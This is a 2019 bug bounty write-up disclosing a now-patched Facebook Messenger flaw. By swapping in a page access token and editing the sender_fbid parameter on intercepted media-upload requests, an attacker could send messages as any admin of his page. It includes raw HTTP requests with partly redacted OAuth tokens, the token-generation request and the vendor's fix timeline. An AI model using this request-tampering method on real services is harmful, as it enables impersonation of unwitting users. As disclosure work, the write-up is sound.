Kassem Bazzoun

Published On: 19 May 2019


Sending message on behalf of other users

Messenger | Android

An attacker is able to send media messages on behalf of other users on Facebook Messenger ,by making the victim admin/editor/moderator on his Facebook Page , then attacker will intercept the request on messenger while he upload photo/video/audio to someone , then changing the authorization header token to a "Page Token" and the sender_fbid to the victim(admin id ) .


This could have allowed a malicious user to send media messaged on behalf of other users by making them(victims) admins on his page .

Reproduction Steps



  • "Kassem Bazzoun" is the attacker 
  • "Semi Colon” is the Victim
  • "Kassem Bazzoun" made the Victim “Semi Colon“ as an editor on his page 


Intercept Requests 

Attacker can get these requests while sending image/ voice/video in Facebook Messenger  (Android/IOS)

Just focus on the Authorization Header and the parameters  sender_fbid / to

  • Photos 
POST /messenger_image/3e8cde28c9b2d9112e9c87af9b71fbc56528664348207412316 HTTP/1.1
Authorization: OAuth EAADo1TDZCuu8BAGLOOBcqIqRnGbSHm48FCJdMC4aWuZCrGJJLdwwKrJJt5awRGPiUXGswiwUUTAphk.........DgWUkgTUyMBUvs
original_timestamp: 1556554877552
sender_fbid: victim_id 
to: receiver_id
Accept-Encoding: gzip, deflate


  • Video Request
POST /messenger_video/83e5ecba32f23sfd09a99f33b96529102120235284153 HTTP/1.1
X-Entity-Name: VID-20190430-WA0150.mp4
X-FB-Connection-Type: unknown
User-Agent: Dalvik/2.1.0 (Linux; U; Android 9; INE-LX1r Build/HUAWEIINE-LX1r) [FBAN/Orca-Android;FBAV/;FBPN/com.facebook.orca;FBLC/en_US;FBBV/151534286;FBCR/;FBMF/HUAWEI;FBBD/HUAWEI;FBDV/INE-LX1r;FBSV/9;FBCA/armeabi-v7a:armeabi;FBDM/{density=3.0,width=1080,height=2128};FB_FW/1;]
Authorization: OAuth EAAGNO4a7r2wBAJJXT1VkfYFfwdf9ZCpSxfcGpfi3azopoTlEvYEZC3639cIVmKefBhvKXadoD17GMt7t3Xx.........eTfcjUHvQZDZD
media_hash: 4dc51a78fd7e39ab3369ddd3873d4d1794b499621a1bd48d867c05c1a6ce65a5
X-FB-Net-HNI: 41503
attempt_id: 6529102120248812254
send_message_by_server: 4
app_id: 256002347743983
Content-Type: application/octet-stream
offline_threading_id: 65291021202332323
X-FB-Connection-Quality: GOOD
sender_fbid : victim_id

to: receiver_id
X-FB-SIM-HNI: 41503


  • Voice Message Request
/messenger_audio/a174a21348fb713ab40a796e63232fs0986529693648684848294 HTTP/1.1
X-Entity-Name: USER_SCOPED_TEMP_DATA_orca-audio-1556800271887.mp4
X-FB-Connection-Type: unknown
User-Agent: Dalvik/2.1.0 (Linux; U; Android 9; INE-LX1r Build/HUAWEIINE-LX1r) [FBAN/Orca-Android;FBAV/;FBPN/com.facebook.orca;FBLC/en_US;FBBV/151534286;FBCR/touch;FBMF/HUAWEI;FBBD/HUAWEI;FBDV/INE-LX1r;FBSV/9;FBCA/armeabi-v7a:armeabi;FBDM/{density=3.0,width=1080,height=2128};FB_FW/1;]
duration: 9811
Authorization: OAuth EAADo1TDZCuu8BANUYHkTMK4SxtTRPbqtIgIuUShTWmsHujjEVIRELxlk5eiZCnA36hSgKl9gjjFJlmuMH3KYy6DlGOhojRZCDHjBZAyMEw0gLut6V4dEFaViofLKELJENiBBjW8SmMZCRho0A6Fq9ZBKXVIuf8nGPZAywnaqjunqwZDZD
X-FB-Net-HNI: 41503
attempt_id: 6529693648683742874
  • sender_fbid : victim_id
  • to: receiver_id

Show Image


Kassem (attacker) changed the token in the Authorization Header of the request to his “Page Token” by taking the token from the previous  Authorization Header and generating the page token via GRAPH API EXPLORER


To get the page access token send the following request 

  • ACCESS_TOKEN = Token for Facebook Messenger
  • GET/V3.2/page_id?fields=access_token

This request should return 


"access_token": "EAADo1TDZCuu8BAGLOOBcqIqRnGbSHm48FCJdMC4aWuZCrGJJLdwwKrJJt5awRGPiUXGswiwUUTAphkkZBv15yb7FNy357AcxAtjZCSrjFkL35muO3h3dZB2zlSZBOiS....."

"id": "page_id"



So  replace the Authorization Token by the new one. 

Note: You should generate a “Page Token” for the page where you and the victim are admin on it . 

Show Image


After chaning the Authorization Header to the page token, I was able to send media messages on behalf of any admin in the page where the server didn't check if this token belong to the admin or not  :)  just a validation if the user has a role in this page (where token is belong to this page ) , and didn't check who generate this token ! 

so let's change the parameters now  :) 

sender_fbid : 

parameter that indicate who is the user sent this message (SENDER ID) 

change it to the victim id ( admin id) 


parameter that indicate  who received this message (receiver ID) 


Finally send the request! 


I sent the message from the victim account (Semi colon) to myself !

Also I can send the message to any other user not only to myself !  

Imagine someone send a message from your account to another user ! 

Show Image


(click on show image

This is  an example how I sent a message on behalf of my friend ( of course I got the permission before testing on his account ) 

Show Image


Facebook fixed the vulnerability by preventing any user from using the "Page Access Token" to send message on behalf of any admin , including your account , so page access token is only used to send message on behalf of the page itselft . New server reply : err_code":"1545003","err_str":"You cannot perform that action."


Kassem 29 Apr 2019

Initial Report

Facebook 03 May 2019

Pre-triage Thank you for your submission. We've managed to reproduce your report and will get back to you once we have had a chance to investigate.

Facebook 07 May 2019

Triaged Thank you for reporting this information to us. We are sending it to the appropriate product team for further investigation. We will keep you upd ... See More

Facebook 07 May 2019

Responsible Disclosure Policy In the meanwhile just a remind to please follow the guidelines of the responsible disclosure policy and refrain from demonstrating this vulnerabi ... See More

Facebook 17 May 2019

Bug Fixed We have looked into this issue and believe that the vulnerability has been patched. Please let us know if you believe that the patch does not res ... See More

Kassem 18 May 2019


Facebook 18 May 2019

Bounty Awarded After reviewing this issue, we have decided to award you a bounty of $7500. Below is an explanation of the bounty amount. Facebook fulfills its b ... See More